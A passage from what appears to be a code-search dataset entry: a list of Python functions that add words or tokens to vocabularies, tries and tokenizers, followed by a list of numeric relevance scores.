prev_words.append(new_word)", "def add(self, event: Event = None) -> None:\n if self.loaded:\n w = self.currentWord\n if w:\n self.spellController.add(w)\n self.tab.onFindButton()", "def token(self, value):\r\n self._token = value", "def add_sentence(self, sentence):\n cleaned = self.clean_string(sentence)\n stemmed = self.stem(cleaned)\n self.texts.append(stemmed)", "def addWord(self, word):\n selected_node = self.root\n for i in word:\n if selected_node.next.get(i) is None:\n new_node = WordDictionary.Node()\n selected_node.next[i] = new_node\n selected_node = new_node\n else:\n selected_node = selected_node.next[i]\n if not selected_node.isFinish:\n selected_node.isFinish = True\n self.size += 1", "def add(self, key, idx=None, count=1):\n key = self.lower_(key)\n if idx is not None:\n self.index2word[idx] = key\n self.word2index[key] = idx\n else:\n if key not in self.word2index:\n idx = len(self.word2index)\n self.index2word[idx] = key\n self.word2index[key] = idx\n\n if key not in self.word_count:\n self.word_count[key] = count\n else:\n self.word_count[key] += count", "def add_word(self, request):\n if Word.query(Word.word == request.word).get():\n raise endpoints.ConflictException('That word is in the list!')\n else:\n word_list = []\n temp = request.word.upper()\n for i in temp:\n if i == \" \" or i < 'A' or i > 'Z':\n raise endpoints.BadRequestException(\n 'Please Enter One Word!')\n else:\n word_list.append(i)\n w = Word(word=request.word, word_list=word_list)\n w.put()\n return StringMessage(message='Added %s to the list!' % request.word)", "def add(self, term, count=1):\n term = term.lower() if self.lower else term\n if term in self.term2id:\n idx = self.term2id[term]\n else:\n idx = len(self.id2term)\n self.id2term[idx] = term\n self.term2id[term] = idx\n if count > 0:\n if term in self.term_frequent:\n self.term_frequent[term] += count\n else:\n self.term_frequent[term] = count\n return idx", "def add_tokens(self, tokens):\n self.result.extend([d for d in tokens])", "def __iadd__(self, other):\n if isinstance(other, Token):\n new = Token(self.text + other.text, self.position, self.category)\n else:\n new = Token(self.text + other, self.position, self.category)\n return new", "def add_tokens(self, sample):\n # Text\n inputs = self._tokenizer.encode_plus(sample['text'],\n add_special_tokens=True,\n max_length=self._max_text_length,\n padding='max_length', # TODO padding here or in model (together with item_glove)?\n truncation=True, # truncate to 512 (added for MSNBC dataset)\n return_attention_mask=True)\n # TODO warn if text was truncated\n #if len(TODO) > self._max_text_length:\n # self._logger.info(f'Truncate long input sentence ({len(TODO)} tokens) to {self._max_text_length}')\n sample['text_tokenized'] = inputs['input_ids']\n sample['text_attention_mask'] = inputs['attention_mask']\n # Item name (mention/surface form)\n inputs = self._tokenizer.encode(sample['item_name'],\n add_special_tokens=False)\n sample['item_name_tokenized'] = inputs", "def add_language_model(self,lm):\n self.lm = lm\n try:\n self.vocab = get_vocab_from_ngram(lm.get_model())\n except:\n raise", "def addWord(self, word): \n\n # make trie for new word\n self.root.makeTrie(word)", "def add_word(self, pair, next_pair = None):\n if pair not in self:\n self.types += 1\n if next_pair:\n self[pair] = Dictogram([next_pair])\n elif next_pair:\n self[pair].add_count(next_pair)\n self.tokens += 1", "def _add_new_word(self, word):\n if word not in self.word_to_id:\n word_id = len(self.word_to_id)\n 
self.word_to_id[word] = word_id\n self.id_to_word[word_id] = word", "def add_vecs_to_vocab(vocab, vectors):\n length = len(vectors[0][1])\n vocab.reset_vectors(width=length)\n for word, vec in vectors:\n vocab.set_vector(word, vector=vec)\n return vocab", "def token_to_alias(raw_text, vocab):\n pass", "def add(self, term, count=1):\n term = term.lower() if self.lower else term\n if term in self.term2id:\n idx = self.term2id[term]\n else:\n idx = len(self.id2term)\n self.id2term[idx] = term\n self.term2id[term] = idx\n if count > 0:\n if term in self.term_frequent:\n self.term_frequent[term] += count\n else:\n self.term_frequent[term] = count\n\n if term not in self.initial_terms:\n for char in term:\n if char not in self.char2id.keys():\n idc = len(self.id2char)\n self.id2char[idc] = char\n self.char2id[char] = idc\n return idx", "def add(self, term):\n self._value = self.accum_param.addInPlace(self._value, term)", "def register_vocabulary(self, entity_value, entity_type,\n alias_of, regex_str):\n with self.lock:\n if regex_str:\n self.engine.register_regex_entity(regex_str)\n else:\n self.engine.register_entity(\n entity_value, entity_type, alias_of=alias_of)", "def addWord(self, word):\n trie = self.trie\n for c in word:\n if c in trie.children:\n trie = trie.children[c]\n else:\n new_trie_node = TrieNode()\n trie.children[c] = new_trie_node\n trie = new_trie_node\n\n trie.is_term = True", "def addWord(self, word):\n cur = self.__root\n for c in word:\n if c not in cur.next:\n cur.next[c] = Node()\n cur = cur.next[c]\n\n if not cur.isWord:\n cur.isWord = True", "def create_vocabulary_single_token(\n data: Series,\n num_most_frequent: Optional[int] = None,\n processor: DataFrameEngine = PANDAS,\n unknown_symbol: str = UNKNOWN_SYMBOL,\n):\n processed_counts = data.str.strip().value_counts(sort=True)\n processed_counts = processor.compute(processed_counts)\n full_vocab = processed_counts.index.tolist()\n # Only add unknown symbol if num most frequent tokens is less than total number of unique tokens\n if num_most_frequent < len(full_vocab):\n vocab = [unknown_symbol] + full_vocab[:num_most_frequent]\n else:\n vocab = full_vocab\n str2idx = {unit: i for i, unit in enumerate(vocab)}\n str2freq = processed_counts.to_dict()\n str2freq = {k: str2freq.get(k, 0) for k in vocab}\n return vocab, str2idx, str2freq", "def _look_up(self, token):\n if self.args.add_vn:\n return tf.nn.embedding_lookup(self.embedding_matrix + \\\n tf.random.normal(tf.shape(self.embedding_matrix), stddev=0.075), token)\n\n return tf.nn.embedding_lookup(self.embedding_matrix, token)", "def add_special_tokens_(model, tokenizer, update_model=True):\n orig_num_tokens = len(tokenizer)\n num_added_tokens = tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN) # doesn't add if they are already there\n #print(\"coab::\",len(tokenizer.vocab))\n if (num_added_tokens > 0 and update_model):\n model.encoder.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)\n model.decoder.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)\n #print(model.encoder.embeddings.word_embeddings.weight.shape)\n #print(model.decoder.bert.embeddings.word_embeddings.weight.shape)", "def write_vocab(vocab, filename):\n print(\"Writing vocab...\")\n with open(filename, \"w\", encoding='utf-8') as f:\n for i, word in enumerate(vocab):\n if i != len(vocab) - 1:\n f.write(\"{}\\n\".format(word))\n else:\n f.write(word)\n print(\"- done. 
{} tokens\".format(len(vocab)))", "def addtoken(name, unsafe_import_token):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n if not unsafe_import_token:\n unsafe_import_token = click.prompt(\"Enter private token\", confirmation_prompt=False, hide_input=True)\n mph.wallet.addToken(name, unsafe_import_token)\n set_shared_morphene_instance(stm)", "def update_vocab(self, text):\n for char in text:\n if char not in self.vocab:\n self.vocab[char] = len(self.vocab)\n if char not in self.char2count:\n self.char2count[char] = 0\n self.char2count[char] += 1\n return", "def __add__(self, other):\n if isinstance(other, Token):\n return Token(self.text + other.text, self.position, self.category)\n else:\n return Token(self.text + other, self.position, self.category)", "def add_word(self, _set, document, label, word):\n \n if _set not in self.sets:\n self.sets[_set] = {}\n\n if document not in self.sets[_set]:\n self.sets[_set][document] = {}\n self.sets[_set][document]['label'] = label\n self.sets[_set][document]['words'] = set()\n self.sets[_set][document]['number_of_words'] = 0\n self.total_number_of_documents += 1\n self.sets[_set][document]['number_of_words'] += 1\n self.sets[_set][document]['words'].add(word)\n\n if word not in self.dictionary:\n self.dictionary[word] = {}\n self.dictionary[word]['id'] = len(self.dictionary)-1\n self.dictionary[word]['docs'] = {}\n\n if document not in self.dictionary[word]['docs']:\n self.dictionary[word]['docs'][document] = 1\n else:\n self.dictionary[word]['docs'][document] += 1", "def addWord(self, word):\n node = self.root\n for ch in word:\n node = node.children[ch]\n node.isWord = True", "def add_keyword(self, new_word):\n\n self.keywords.append(new_word)\n words = Keywords()\n words.add(new_word)\n mongo.db.users.update({\"name\": self.username},\n {\"$set\": {\"keywords\": self.keywords}})", "def add_word_and_label_id(self, word, label_id):\n self.words.append(word)\n self.label_ids.append(label_id)", "def add_words(self, words):\r\n for word in words:\r\n self.add(word)", "async def wordfilter_add(self, ctx, *, phrase):\n phrase = phrase.lower()\n await self.bot.redis.rpush('wordfilter', phrase)\n self.words.append(phrase)\n await ctx.send(f'Added `{phrase}` to the filtered words')", "def addWord(self, word):\n node = self\n for c in word:\n node = node[c]\n node.go += 1", "def createToken(self,type,value):\n newToken = Token(type, value)\n self.tokensTable.append(newToken)", "def add_word_to_dictionary(self, word: str):\n self.trie.add_word(word)", "def addWord(self, word: str) -> None:\n if str(len(word)) in self.elements:\n self.elements[str(len(word))].add(word)\n else:\n self.elements[str(len(word))] = {word}", "def add(self, sentence):\n self._sentences.add(sentence)" ]
[ "0.7474371", "0.7235822", "0.6903988", "0.6526929", "0.65188766", "0.6505907", "0.6505907", "0.64998305", "0.6496983", "0.6493279", "0.64262176", "0.6420701", "0.6391367", "0.6325264", "0.63200015", "0.62549394", "0.62311953", "0.622333", "0.6177798", "0.61690384", "0.61336285", "0.61031127", "0.6096867", "0.60905343", "0.60826486", "0.6082443", "0.6053392", "0.60310906", "0.6017655", "0.5985635", "0.5985635", "0.59685165", "0.5918892", "0.5918892", "0.5906536", "0.5901874", "0.5886092", "0.5886092", "0.5881147", "0.58716494", "0.58709234", "0.5863565", "0.582057", "0.5819288", "0.58116066", "0.5798947", "0.5776732", "0.5759984", "0.575981", "0.5750529", "0.57484907", "0.57032067", "0.5700063", "0.5692102", "0.5655651", "0.56532747", "0.5646247", "0.562467", "0.5617013", "0.5584298", "0.5558455", "0.5558237", "0.5553753", "0.5548334", "0.5530405", "0.55226505", "0.55153143", "0.55141014", "0.54802996", "0.5479846", "0.54763407", "0.54537123", "0.5442956", "0.5442045", "0.5441605", "0.5440332", "0.54367423", "0.54364043", "0.542796", "0.5426528", "0.5426118", "0.54260564", "0.54036283", "0.5402926", "0.5395004", "0.5394236", "0.5393136", "0.53918856", "0.53917354", "0.538835", "0.5378691", "0.53780437", "0.53669053", "0.5356126", "0.53551996", "0.53549474", "0.53537476", "0.53488505", "0.5342317" ]
0.68879795
4
Update dictionary from a collection of documents. Each document is a list of tokens.
def add_documents(self, docs): if 'sentences' in docs: for sent in docs.sentences: sent = map(self.process_token, [t for t in sent.tokens if not t.is_stopword]) self._token_count.update(sent) else: sent = list(map(self.process_token, [t for t in docs.tokens if not t.is_stopword])) self._token_count.update(sent)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_documents(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_document_lists(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def update(tokens):\n global TOKENS\n\n for token_id in tokens:\n\n if token_id not in TOKENS:\n TOKENS[token_id] = {}\n\n if isinstance(tokens, dict):\n token_info = tokens[token_id]\n if token_info is None:\n token_info = {}\n\n alias = token_info.get(\"alias\")\n if alias is not None:\n TOKENS[token_id][\"alias\"] = alias\n\n decimals = token_info.get(\"decimals\")\n if decimals is not None:\n TOKENS[token_id][\"decimals\"] = decimals", "def intern_documents(documents: Dict[str, List[List[str]]], word_interner: Dict[str, int], unk_token: str):\n ret = dict()\n unk = word_interner[unk_token]\n for docid, sentences in documents.items():\n ret[docid] = [[word_interner.get(w, unk) for w in s] for s in sentences]\n return ret", "def update_existing(doc_data_tples):\n def per_doc(doc, data_tples):\n def per_field(data_tple):\n field, datas = data_tple\n map(_do_append_field(doc, field), datas)\n map(per_field, data_tples)\n return doc\n\n __docs = ( (per_doc(doc, data_tples), data_tples) for doc,data_tples in doc_data_tples )\n return __docs", "def updateDocumentAll(self, documents):\n docs = []\n for document in documents:\n if isinstance(document, couch.Document):\n document = document.getData()\n\n # these are required params\n if \"_id\" not in document or \"_rev\" not in document:\n raise Exception(\"Both _id & _rev fields are required!\")\n\n docs.append(document)\n\n return self.client.post(self.name +\"/_bulk_docs\", None,\n {\"docs\": docs}).getBodyData()", "def update_from_document(self, document_path):\n with open(document_path, 'r') as document_file:\n for sentence in document_file:\n words = sentence.strip().split()\n for word in words:\n self._add_new_word(word)", "def preprocess(self, documents):\n\n # A dict storing the frequency of each word\n word_freq = {}\n\n # Iterate for each document\n for doc in documents:\n # Split the document into a list of words and iterate on it\n for w in extract_words(doc):\n # Update word frequencies\n '''YOUR CODE HERE'''\n if w not in word_freq.keys():\n word_freq[w] = 1\n else:\n word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n\n # A set of words with frequency less than 'self.min_freq'\n remove_words = set()\n\n # Check frequency of each word and add to 'remove_words'\n # if it's frequency is below self.min_freq\n\n ''' YOUR CODE HERE '''\n for w in word_freq.keys():\n if word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'word_freq'\n for w in remove_words:\n del word_freq[w]\n\n # Fill 'self.word_to_idx' and 'self.idx_to_word' for\n # each word in 'word_freq' (dicts are explained above)\n\n i = 0\n for w in word_freq.keys():\n self.word_to_idx[w] = i\n self.idx_to_word[i] = w \n i += 1\n\n ''' END YOUR CODE HERE '''", "def fit(self, documents):\n # Get a list of all the unique tokens that appear\n vocab = list({\n token for doc in documents\n for token in self.tokenizer(doc)\n if token not in self._word2index\n 
})\n\n # This is UNK, START, END, and PAD.\n nb_special_tokens = 4\n\n # First, we map token -> ID, leaving the first slots for special tokens\n self._word2index.update({\n word: idx\n for idx, word in enumerate(vocab, nb_special_tokens)\n })\n\n # Next, we invert this map, which we can do since it was built from\n # unique vocabulary elements and is by definition bijective.\n self._index2word.update({\n idx: word\n for word, idx in self._word2index.items()\n })\n\n return self", "def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list", "def get_doc_dicts(self, doc_ids):\n pass", "def updateMultipleDocuments(cred, payload):\n\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n data['writes'].append(pathData)\n \n makeRequest(cred, url, 'POST', data)", "def add_doc_in_posting_list(word_posting_list, docs):\n for doc_score in docs:\n if doc_score[\"doc\"] in word_posting_list.keys():\n word_posting_list[doc_score[\"doc\"]] = int(doc_score[\"score\"]) + int(word_posting_list[doc_score[\"doc\"]])\n else:\n word_posting_list[doc_score[\"doc\"]] = doc_score[\"score\"]", "def load(self, documents, uniquify=False):\n assert documents, \"missing list of documents, text single doc per line\"\n assert isinstance(documents, list), \"documents must be list\"\n assert isinstance(documents[0], list), \"each document is also a list\"\n #--------------------------------------------------------------------------------------------\n\n def _get_new_counts(document):\n return Counter(document) if not uniquify else Counter(list(set(document)))\n\n for idx, document in enumerate(documents):\n new_counter = _get_new_counts(document)\n self.counter.update(new_counter)\n if idx % 1000 == 0:\n print(\"load: {}\\r\".format(idx), end='')\n return self", "def parse_doc(self, doc_as_list):\n\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n indice = doc_as_list[4]\n retweet_text = doc_as_list[5]\n retweet_url = doc_as_list[6]\n retweet_indice = doc_as_list[7]\n quote_text = doc_as_list[8]\n quote_url = doc_as_list[9]\n quoted_indice = doc_as_list[10]\n retweet_quoted_text = doc_as_list[11]\n retweet_quoted_url = doc_as_list[12]\n retweet_quoted_indice = doc_as_list[13]\n\n term_dict = {}\n\n tokenized_text = self.parse_sentence(full_text)\n tokenized_quote = self.parse_sentence(quote_text)\n # tokenized_url = self.handle_url(url)\n\n\n doc_length = len(tokenized_text) # after text operations - length of full_text\n\n new_tokenized_text = tokenized_text + tokenized_quote\n\n # spell checker\n # new_tokenized_text = self.spell.update(new_tokenized_text)\n\n for term in new_tokenized_text:\n if term is not \"\": # or (term.isalpha() and len(term) == 1)\n if term not in term_dict:\n term_dict[term] = 1\n else:\n term_dict[term] += 1\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def prepare_dictionary_from_docs(self):\n if os.path.exists(self.DICT_PATH):\n return True\n self.logger.info(\"START PREPARING DICT\")\n 
for fn in os.listdir(self.wiki_path):\n self.logger.info(\"dict update {0}\".format(fn))\n content = self.get_processed_content(fn)\n self.dictionary.add_documents([content])\n self.dictionary.filter_extremes(no_below=20, no_above=0.1, keep_n=100000)\n self.dictionary.compactify()\n self.dictionary.save(self.DICT_PATH)\n return True", "def get_dict(cleaned_docs):\n data = []\n for doc in cleaned_docs:\n data += doc\n return list(set(data))", "def transform(self, docs):\n return [doc for doc in docs]", "def doc2bow(self, document, allow_update=False, return_missing=False):\n\n doc=[t.text for t in document.tokens]\n\n if isinstance(doc, string_types):\n raise TypeError(\"doc2bow expects an array of unicode tokens on input, not a single string\")\n\n # Construct (word, frequency) mapping.\n counter = defaultdict(int)\n for w in doc:\n counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1\n\n token2id = self.token2id\n if allow_update or return_missing:\n missing = sorted(x for x in iteritems(counter) if x[0] not in token2id)\n if allow_update:\n for w, _ in missing:\n # new id = number of ids made so far;\n # NOTE this assumes there are no gaps in the id sequence!\n token2id[w] = len(token2id)\n result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id}\n\n if allow_update:\n self.num_docs += 1\n self.num_pos += sum(itervalues(counter))\n self.num_nnz += len(result)\n # keep track of document and collection frequencies\n for tokenid, freq in iteritems(result):\n self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq\n self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1\n\n # return tokenids, in ascending id order\n result = sorted(iteritems(result))\n if return_missing:\n return result, dict(missing)\n else:\n return result", "def _build_token_dict(self, corpus: List[List[str]]):\n self.token2idx = self.load_from_vocab_file(self.vocab_path)\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def update_all(cls, documents: List[dict]) -> (List[dict], List[dict]):\n if not documents:\n raise ValidationFailed([], message=\"No data provided.\")\n\n if not isinstance(documents, list):\n raise ValidationFailed(documents, message=\"Must be a list.\")\n\n new_documents = copy.deepcopy(documents)\n\n errors = cls.validate_and_deserialize_update(new_documents)\n if errors:\n raise ValidationFailed(documents, errors)\n\n try:\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Updating {new_documents}...\")\n previous_documents, updated_documents = cls._update_many(new_documents)\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Documents updated to {updated_documents}.\")\n return (\n [cls.serialize(document) for document in previous_documents],\n [cls.serialize(document) for document in updated_documents],\n )\n except pymongo.errors.DuplicateKeyError:\n raise ValidationFailed(\n [cls.serialize(document) for document in documents],\n message=\"One document already exists.\",\n )", "def load_documents(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n if os.path.exists(os.path.join(data_dir, 'docs.jsonl')):\n assert not os.path.exists(os.path.join(data_dir, 'docs'))\n return load_documents_from_file(data_dir, docids)\n\n docs_dir = os.path.join(data_dir, 
'docs')\n res = dict()\n if docids is None:\n docids = sorted(os.listdir(docs_dir))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n with open(os.path.join(docs_dir, d), 'r') as inf:\n lines = [l.strip() for l in inf.readlines()]\n lines = list(filter(lambda x: bool(len(x)), lines))\n tokenized = [list(filter(lambda x: bool(len(x)), line.strip().split(' '))) for line in lines]\n res[d] = tokenized\n return res", "def load_documents_from_file(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n docs_file = os.path.join(data_dir, 'docs.jsonl')\n documents = load_jsonl(docs_file)\n documents = {doc['docid']: doc['document'] for doc in documents}\n res = dict()\n if docids is None:\n docids = sorted(list(documents.keys()))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n lines = documents[d].split('\\n')\n tokenized = [line.strip().split(' ') for line in lines]\n res[d] = tokenized\n return res", "def initialize_terms_and_postings():\n global dictionary, postings\n for id in document_filenames:\n document = getDocumentContent(document_filenames[id])\n if(document_filenames[id].rfind(\".pdf\") == len(document_filenames[id]) - 4):\n terms = tokenize(document.encode('utf-8'))\n if(document_filenames[id].rfind(\".txt\") == len(document_filenames[id]) - 4):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".docx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".pptx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n unique_terms = set(terms)\n dictionary = dictionary.union(unique_terms)\n for term in unique_terms:\n postings[term][id] = terms.count(term) # the value is the\n # frequency of the\n # term in the\n # document", "def _create_dictionary(self, document_set):\n words = self._normalize_words(document_set.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def set_keyword_map(self):\n \n ret = defaultdict(list)\n for idx, doc in enumerate(self.docs):\n for token in doc:\n if token in self.dictionary.token2id:\n ret[token].append(idx)\n \n self.keyword_map = ret\n return ret", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def add_new_doc(self, document, documents_list_length=10000):\n\n try:\n document_dictionary = document.term_doc_dictionary\n # self.countDoc += 1\n for term in document_dictionary.keys():\n if self.stemming == 'y':\n my_stemmer = Stemmer()\n 
term = my_stemmer.stem_term(term)\n # Update inverted index and posting\n if term not in self.inverted_idx.keys():\n self.inverted_idx[term] = [1, [\n (document_dictionary[term], document.tweet_id)]] # amount of doc, freq in the doc, doc id.\n\n else:\n self.inverted_idx[term][0] += 1 # amount of doc\n self.inverted_idx[term][1].append((document_dictionary[term],\n document.tweet_id)) # freq in the doc # doc id\n\n if term not in self.postingDict.keys():\n self.postingDict[term] = [(document.tweet_id, document_dictionary[term])]\n else:\n self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n # self.countTweet -= 1\n\n if document.tweet_id not in self.tweet_dict.keys():\n self.tweet_dict[document.tweet_id] = [[term, document_dictionary[term]], 1,\n 0] # [term,freq in tweet], amount of unique terms in tweet, amount of terms in tweet\n elif document_dictionary[term] > self.tweet_dict[document.tweet_id][0][\n 1]: # tweet exist, compering between freq in two terms\n if self.tweet_dict[document.tweet_id][0][\n 1] == 1: # before change term check if the last term is unique\n self.tweet_dict[document.tweet_id][\n 1] += 1 # last term is unique: add to the amount of uniqe terms in tweet\n self.tweet_dict[document.tweet_id][0] = [term,\n document_dictionary[term]] # change between the terms\n self.tweet_dict[document.tweet_id][2] += 1\n elif document_dictionary[term] == 1: # tweet exist, not most common, check if unique\n self.tweet_dict[document.tweet_id][1] += 1\n self.tweet_dict[document.tweet_id][2] += 1\n except:\n # print('problem in indexer : add_new_doc')\n # print(traceback.print_exc())\n pass", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def preprocess(self, documents):\n\n # Store the total number of documents\n num_docs = np.float(len(documents))\n\n # A dict storing the frequency of each word across all documents\n total_word_freq = {}\n\n # A dict storing the number of documents that word appears in\n doc_word_freq = {}\n\n # Iterate over all documents\n for doc in documents:\n # Split the string into a list of words\n words = extract_words(doc)\n\n # Update the 'total_word_freq' dict using all words in 'words'\n for w in words:\n ''' YOUR CODE HERE '''\n if w not in total_word_freq.keys():\n total_word_freq[w] = 1\n else:\n total_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # Update the 'doc_word_freq' dict. Remember to only add '1' corresponding to\n # each word in a document. In case a word appears twice in a document, then\n # it should be ignored. 
We use the set() data structure to achieve this.\n for w in set(words):\n ''' YOUR CODE HERE '''\n if w not in doc_word_freq:\n doc_word_freq[w] = 1\n else:\n doc_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # A set of words with total frequency less than 'self.min_freq'\n remove_words = set()\n\n ''' YOUR CODE HERE '''\n\n # Check frequency of each word and add to 'remove_words'\n for w in total_word_freq.keys():\n if total_word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'total_word_freq' and\n # 'doc_word_freq'.\n for w in remove_words:\n del total_word_freq[w]\n del doc_word_freq[w]\n\n # Create a numpy array to store frequencies from which\n # we can create the 'self.idf' preprocessed numpy array.\n word_freq_tensor = np.zeros(len(doc_word_freq))\n\n # For each word in 'doc_word_freq' dict, update\n # 'self.word_to_idx' and 'self.idx_to_word' and\n # 'word_freq_tensor'.\n i = 0\n for w in doc_word_freq.keys():\n self.word_to_idx[w] = i \n self.idx_to_word[i] = w\n word_freq_tensor[i] = doc_word_freq[w]\n i+=1\n \n #print(word_freq_tensor.shape)\n #print(word_freq_tensor)\n # Calculate 'self.idf' (see hint.pdf for formula)\n self.idf = -1*np.log(word_freq_tensor/(len(documents)))\n ''' END YOUR CODE HERE '''", "def process_new_tokens(tokens,processed_tokens_set, model, dictionary):\n if hasattr(model, 'using_pretrained') and model.using_pretrained is not None:\n processed_tokens_set.update(tokens)\n update_embedding_layer(processed_tokens_set, model, dictionary)", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def pre_process(self, documents):\n\n return documents", "def insert_many(self, documents: Iterable[dict]) -> None:\n for i, document in enumerate(documents):\n if isinstance(document, dict):\n self._store_document(document)\n else:\n raise TypeError(\n f\"The document at index {i} was not a dictionary. 
All documents must be dictionaries.\"\n )\n self._dump()", "def _docMapping(self):\n doc2quests = defaultdict(list)\n for q, d in self.quest2doc.items():\n doc2quests[d].append(q)\n return doc2quests", "def create_document_dictionary(documents):\n \n document_dictionary = dict()\n for document in documents:\n document_dictionary[document.cord_uid] = document\n return document_dictionary", "def transform4Doc2Vec(docs):\n\n # transform documents to be used by doc2Vec\n documents = []\n analyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\n for i, doc in enumerate(docs):\n # use first line if documents are not tokenized, otherwise next line\n # words = text.lower().split()\n tags = [i]\n documents.append(analyzedDocument(doc, tags))\n\n return documents", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def enrich(self, lazy_corpus_loader, fileids=None):\n tag_dict = self.tag_dict\n word_tag_dict = self.word_tag_dict\n for word_tag in lazy_corpus_loader.tagged_words(fileids=fileids):\n word = word_tag[0]\n tag = word_tag[1]\n if not tag_dict.get(tag, None):\n raise KeyError, \"Unknown pos-tag: %s\" % tag\n tag_dict = word_tag_dict.get(word, {})\n tag_dict[tag] = tag_dict.get(tag, 0) + 1\n word_tag_dict[word] = tag_dict\n self.word_tag_dict = word_tag_dict", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def set_doc_phrases(doc_phrases, docs, phrases):\n for doc in docs:\n if not doc in doc_phrases:\n doc_phrases[doc] = []\n doc_phrases[doc] = doc_phrases[doc] + phrases", "def tokenize_document(doc_info: dict, tokenizer: BertTokenizer, max_doc_length: int = None) -> dict:\n sub_tokens: List[str] = [] # all sub tokens of a document\n sentence_map: List[int] = [] # collected tokenized tokens -> sentence id\n subtoken_map: List[int] = [] # collected tokenized tokens -> original token id\n\n word_idx = -1\n\n for sentence_id, sentence in enumerate(doc_info['sentences']):\n for token in sentence:\n word_idx += 1\n word_tokens = tokenizer.tokenize(token)\n sub_tokens.extend(word_tokens)\n sentence_map.extend([sentence_id] * len(word_tokens))\n subtoken_map.extend([word_idx] * len(word_tokens))\n if max_doc_length:\n num_to_pad = max_doc_length - len(sub_tokens)\n sub_tokens.extend([\"[PAD]\"] * num_to_pad)\n sentence_map.extend([sentence_map[-1]+1] * num_to_pad)\n subtoken_map.extend(list(range(word_idx+1, num_to_pad+1+word_idx)))\n # global MAX_LENGTH\n # if 